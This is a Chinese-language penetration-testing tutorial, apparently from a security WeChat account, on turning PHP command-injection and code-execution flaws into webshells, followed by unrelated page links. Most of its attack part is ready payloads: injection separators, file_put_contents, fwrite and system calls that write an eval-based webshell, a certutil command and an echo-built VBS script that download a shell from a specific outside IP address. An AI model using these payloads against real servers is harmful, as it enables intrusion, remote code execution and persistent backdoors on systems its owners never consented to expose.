通过代码执行或命令执行写Shell 代码运行命令
bigegpt 2024-10-12 06:59 9 浏览
公众号:白帽子左一
专注分享渗透经验,干货技巧...
本文由团队手电筒分享,如果你还是个小白担心看不懂,没关系,“三步写马””如何上传木马”“如何拿下服务器并妥善管理”等实战内容可以结合视频观看,视频演示先从原理,再到实操演示,一步步清晰明了,更易吸收,视频私信我
PHP
一.命令执行
命令执行(注入)常见可控位置情况有下面几种:
system("$arg"); //可控点直接是待执行的程序
如果我们能直接控制$arg,那么就能执行执行任意命令了。
system("/bin/prog $arg"); //可控点是传入程序的整个参数
我们能够控制的点是程序的整个参数,我们可以直接用&& || 或 | 等等,利用与、或、管道命令来执行其他命令(可以涉及到很多linux命令行技巧)。
system("/bin/prog -p $arg"); //可控点是传入程序的某个参数的值(无引号包裹)
我们控制的点是一个参数,我们也同样可以利用与、或、管道来执行其他命令,情境与二无异。
system("/bin/prog -p=\"$arg\"");//可控点是传入程序的某个参数的值(有双引号包裹)
这种情况压力大一点,有双引号包裹。
如果引号没有被转义,我们可以先闭合引号,成为第三种情况后按照第三种情况来利用,如果引号被转义(addslashes)、我们也不必着急。
linux shell 环境下双引号中间的变量也是可以被解析的,我们可以在双引号内利用反引号执行任意命令 id
system("/bin/prog --p='$arg'"); //可控点是传入程序的某个参数的值(有单引号包裹)
这是最困难的一种情况
因为单引号内只是一个字符串,我们要先闭合单引号才可以执行命令。
如:system(“/bin/prog –p=’aaa’ | id”)
在漏洞检测中,除了有回显的命令
还可以使用盲打的方式,比如curl远程机器的某个目录(看access.log),或者通过dns解析的方式获取到漏洞机器发出的请求。
当我们确定了OS命令注入漏洞后,通常可以执行一些初始命令来获取有关受到破坏的系统的信息。
以下是在Linux和Windows平台上常用的一些命令的摘要:
命令目的 | linux | windows |
当前用户名 | whoami | whoami |
操作系统 | uname -a | ver |
网络配置 | ifconfig | ipconfig /all |
网络连接 | netstat -an | netstat -an |
运行进程 | ps -ef | tasklist |
命令分隔符
在Linux上, ; 可以用 |、|| 代替
;前面的执行完执行后面的
|是管道符,显示后面的执行结果
||当前面的执行出错时执行后面的
可用**%0A和 \n**换行执行命令
在Windows上,不能用 ; 可以用&、&&、|、||代替
&前面的语句为假则直接执行后面的
&&前面的语句为假则直接出错,后面的也不执行
|直接执行后面的语句
||前面出错执行后面的
PHP 支持一个执行运算符:反引号(``) PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回
<?php echo `whoami`;?>
效果与函数 shell_exec() 相同,都是以字符串的形式返回一个命令的执行结果,可以保存到变量中
二.代码执行
此处以php为例,其它语言也存在这类利用。
(1) preg_replace()函数:
mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [,int $limit =-1[,int&$count ]])
当$pattern处存在e修饰符时,$replacement 会被当做php代码执行。
(2)mixed call_user_func( callable $callbank [ , mixed $parameter [ , mixed
$…):
第一个参数为回调函数,第二个参数是回调函数的参数
(3)eval()和assert():
当assert()的参数为字符串时 可执行PHP代码
【区分】:
eval(" phpinfo(); ");【√】eval(" phpinfo() ");【X】
assert(" phpinfo(); ");【√】assert(" phpinfo() ");【√】
三.反序列化
php反序列化导致RCE的原理及利用,参考专题文章:
四.通过代码执行或命令执行写shell
代码执行写shell
当遇到一个可以代码执行的位置时,我们可以通过写webshell来进行进一步渗透
1.file_put_contents函数
file_put_contents函数格式为file_put_contents(filename,data)
指定写入文件名和写入文件的数据
可以通过这个函数去写入数据
这里用了网上的漏洞测试的平台
测试语句为:
file_put_contents('gt.php','<?php eval($_REQUEST[5]);?>');
访问文件
2.fopen() 创建文件函数
fopen函数,格式为fopen(filename,mode) 前面是文件名,后面是规定要求到该文件/流的访问类型
它的作用是打开文件或url,这里当后续命令为w,或W+ 时,当文件不存在的话就会新建一个文件
然后再用fwrite去写入数据
fwrite()写入文件函数,格式为fwrite(file,string),这里file是文件名,string是写入的字符串
这里注意如果是通过assert函数去代码执行,那么只允许一条语句去执行
这里可以把两个命令写一起
例如
fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');
执行效果如下
执行语句
fwrite(fopen('z23.php','a'),'<?php phpinfo(); ?>');
访问文件
3.fputs函数
Fputs函数也是php里一个用于写入文件的函数,它其实是fwrite的别名
基本用法和fwrite一样
测试语句为
fputs(fopen('tk.php','w'),'<?php phpinfo();?>');
执行语句
fputs(fopen('tk.php','w'),'<?php phpinfo();?>');
访问文件
4.通过执行命令执行函数去写shell
通过代码执行漏洞去执行代码脚本调用操作系统命令
常用函数有
system()
exec()
shell_exec()
passthru()
pcntl_exec()
popen()
proc_open()
这里我们只挑选其中部分来测试,其他的道理差不多
4.1、首先为system()
测试语句为
system(' echo "<?php @eval($_REQUEST[8])?>" >pp.php ');
然后访问文件测试下
测试完成
4.2、exec()函数
测试语句如下
exec(' echo "<?php @eval($_REQUEST[8])?>" >ppl.php ');
在本地执行下
访问生成文件
4.3、shell_exec()函数
测试语句为
shell_exec(' echo "<?php @eval($_REQUEST[8])?>" >ppk.php ');
在本地执行测试
访问生成文件
4.4、passthru()函数
测试语句为
passthru(' echo "<?php @eval($_REQUEST[8])?>" >ppm.php ');
在本地测试
访问生成文件
命令执行写webshell
通过cmd命令去写入
通过cmd里的echo去写入webshell
命令如下
echo "<?php @eval($_REQUEST[8])?>">223.php
执行如下
返回页面如下
访问223.php
通过命令执行去远程下载shell
利用windows的certutil命令
例:
certutil -urlcache -split -f http://129.211.169.121/123.php
通过windows的certutil去在外部下载文件
这个certutil是windows系统上预装的工具,一般用于校验md5,sha1,sha256,下载文件
执行这个需要相当高的权限,
在搭建的服务器上安装好环境
在本地测试一下
执行命令
certutil -urlcache -split -f http://129.211.169.121/123.php
得到结果
得到返回文件
访问效果如下
通过vbs去建立脚本去下载
vbs是基于visual Basic的脚本语言,一般windows设备自带
这里我们通过命令执行去写入脚本,然后再通过命令执行去下载shell
测试脚本如下
Set args =Wscript.Arguments
Url="http://129.211.169.121/1234.php"
dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm:Set bStrm = createobject("Adodb.Stream")
xHttp.Open"GET",Url,False
xHttp.Send
with bStrm
.type =1
.open
.write xHttp.responseBody
.savetofile "12345.php",2
endwith
先再远程机器上设立一个php文件名为1234.php
内容为
<?php
echo “<?php phpinfo();?>”;
?>
为什么要这样写呢?
这个脚本是直接读取远程机器上的文件信息然后写入到一个文件里,我们通过读取这个php页面显示的语句去获得shell内容
然后我们在页面里去写入vbs文件,这里脚本内容过长,且有换行,我们通过echo 一条条写入命令,和前面命令执行写shell一样
echo Set args =Wscript.Arguments> xxx.vbs
echo Url="http://129.211.169.121/1234.php">>xxx.vbs
echo dim xHttp:Set xHttp = createobject("Microsoft.XMLHTTP")>>xxx.vbs
echo dim bStrm:Set bStrm = createobject("Adodb.Stream")>>xxx.vbs
echo xHttp.Open"GET",Url,False>>xxx.vbs
echo xHttp.Send>>xxx.vbs
echo with bStrm >>xxx.vbs
echo .type =1>>xxx.vbs
echo .open >>xxx.vbs
echo .write xHttp.responseBody >>xxx.vbs
echo .savetofile "12345.php",2>>xxx.vbs
echo endwith>>xxx.vbs
后续内容通过>> 换行写入
得到xxx.vbs文件
然后在存在命令执行处执行命令去下载文件
执行命令 start wscript -e:vbs xxx.vbs
然后得到文件
去访问
未完待续...
相关推荐
- 得物可观测平台架构升级:基于GreptimeDB的全新监控体系实践
-
一、摘要在前端可观测分析场景中,需要实时观测并处理多地、多环境的运行情况,以保障Web应用和移动端的可用性与性能。传统方案往往依赖代理Agent→消息队列→流计算引擎→OLAP存储...
- warm-flow新春版:网关直连和流程图重构
-
本期主要解决了网关直连和流程图重构,可以自此之后可支持各种复杂的网关混合、多网关直连使用。-新增Ruoyi-Vue-Plus优秀开源集成案例更新日志[feat]导入、导出和保存等新增json格式支持...
- 扣子空间体验报告
-
在数字化时代,智能工具的应用正不断拓展到我们工作和生活的各个角落。从任务规划到项目执行,再到任务管理,作者深入探讨了这款工具在不同场景下的表现和潜力。通过具体的应用实例,文章展示了扣子空间如何帮助用户...
- spider-flow:开源的可视化方式定义爬虫方案
-
spider-flow简介spider-flow是一个爬虫平台,以可视化推拽方式定义爬取流程,无需代码即可实现一个爬虫服务。spider-flow特性支持css选择器、正则提取支持JSON/XML格式...
- solon-flow 你好世界!
-
solon-flow是一个基础级的流处理引擎(可用于业务规则、决策处理、计算编排、流程审批等......)。提供有“开放式”驱动定制支持,像jdbc有mysql或pgsql等驱动,可...
- 新一代开源爬虫平台:SpiderFlow
-
SpiderFlow:新一代爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。-精选真开源,释放新价值。概览Spider-Flow是一个开源的、面向所有用户的Web端爬虫构建平台,它使用Ja...
- 通过 SQL 训练机器学习模型的引擎
-
关注薪资待遇的同学应该知道,机器学习相关的岗位工资普遍偏高啊。同时随着各种通用机器学习框架的出现,机器学习的门槛也在逐渐降低,训练一个简单的机器学习模型变得不那么难。但是不得不承认对于一些数据相关的工...
- 鼠须管输入法rime for Mac
-
鼠须管输入法forMac是一款十分新颖的跨平台输入法软件,全名是中州韵输入法引擎,鼠须管输入法mac版不仅仅是一个输入法,而是一个输入法算法框架。Rime的基础架构十分精良,一套算法支持了拼音、...
- Go语言 1.20 版本正式发布:新版详细介绍
-
Go1.20简介最新的Go版本1.20在Go1.19发布六个月后发布。它的大部分更改都在工具链、运行时和库的实现中。一如既往,该版本保持了Go1的兼容性承诺。我们期望几乎所...
- iOS 10平台SpriteKit新特性之Tile Maps(上)
-
简介苹果公司在WWDC2016大会上向人们展示了一大批新的好东西。其中之一就是SpriteKitTileEditor。这款工具易于上手,而且看起来速度特别快。在本教程中,你将了解关于TileE...
- 程序员简历例句—范例Java、Python、C++模板
-
个人简介通用简介:有良好的代码风格,通过添加注释提高代码可读性,注重代码质量,研读过XXX,XXX等多个开源项目源码从而学习增强代码的健壮性与扩展性。具备良好的代码编程习惯及文档编写能力,参与多个高...
- Telerik UI for iOS Q3 2015正式发布
-
近日,TelerikUIforiOS正式发布了Q32015。新版本新增对XCode7、Swift2.0和iOS9的支持,同时还新增了对数轴、不连续的日期时间轴等;改进TKDataPoin...
- ios使用ijkplayer+nginx进行视频直播
-
上两节,我们讲到使用nginx和ngixn的rtmp模块搭建直播的服务器,接着我们讲解了在Android使用ijkplayer来作为我们的视频直播播放器,整个过程中,需要注意的就是ijlplayer编...
- IOS技术分享|iOS快速生成开发文档(一)
-
前言对于开发人员而言,文档的作用不言而喻。文档不仅可以提高软件开发效率,还能便于以后的软件开发、使用和维护。本文主要讲述Objective-C快速生成开发文档工具appledoc。简介apple...
- macOS下配置VS Code C++开发环境
-
本文介绍在苹果macOS操作系统下,配置VisualStudioCode的C/C++开发环境的过程,本环境使用Clang/LLVM编译器和调试器。一、前置条件本文默认前置条件是,您的开发设备已...
- 一周热门
- 最近发表
- 标签列表
-
- mybatiscollection (79)
- mqtt服务器 (88)
- keyerror (78)
- c#map (65)
- resize函数 (64)
- xftp6 (83)
- bt搜索 (75)
- c#var (76)
- mybatis大于等于 (64)
- xcode-select (66)
- httperror403.14-forbidden (63)
- logstashinput (65)
- hadoop端口 (65)
- dockernetworkconnect (63)
- esxi7 (63)
- vue阻止冒泡 (67)
- c#for循环 (63)
- oracle时间戳转换日期 (64)
- jquery跨域 (68)
- php写入文件 (73)
- java大写转小写 (63)
- kafkatools (66)
- mysql导出数据库 (66)
- jquery鼠标移入移出 (71)
- 取小数点后两位的函数 (73)